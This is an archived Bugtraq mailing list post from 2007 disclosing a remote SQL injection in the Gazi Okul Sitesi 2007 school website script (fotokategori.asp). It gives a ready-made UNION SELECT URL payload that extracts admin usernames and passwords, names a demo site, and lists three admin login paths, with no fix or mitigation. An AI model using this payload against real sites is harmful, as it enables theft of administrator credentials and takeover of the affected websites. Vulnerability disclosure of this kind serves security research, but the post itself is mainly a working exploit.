Bugtraq mailing list archives

Gazi Okul Sitesi 2007(tr)(fotokategori.asp) Remote SQL Injection


From: r00t-balance () hotmail com
Date: 4 Apr 2007 20:21:23 -0000

#Title  : Gazi Okul Sitesi 2007(tr)(fotokategori.asp) Remote SQL Injection Vulnerability
#Author : CoNqUeRoR
#Demo Page   : http://www.gazilogo.com
#Script Page : http://www.aspindir.com/indir.asp?id=4746
#Date : 30-03-2007

#Vulnerability:
--------------------

#Username & Password : /fotokategori.asp?'%20union%20select%201,2,3,password,5,6,username,8%20from%20admin

#Admin Logins : /duyuruadmin/
                /defteradmin/
                /haberadmin/
====================================

Special Thank: B-S-N


Current thread: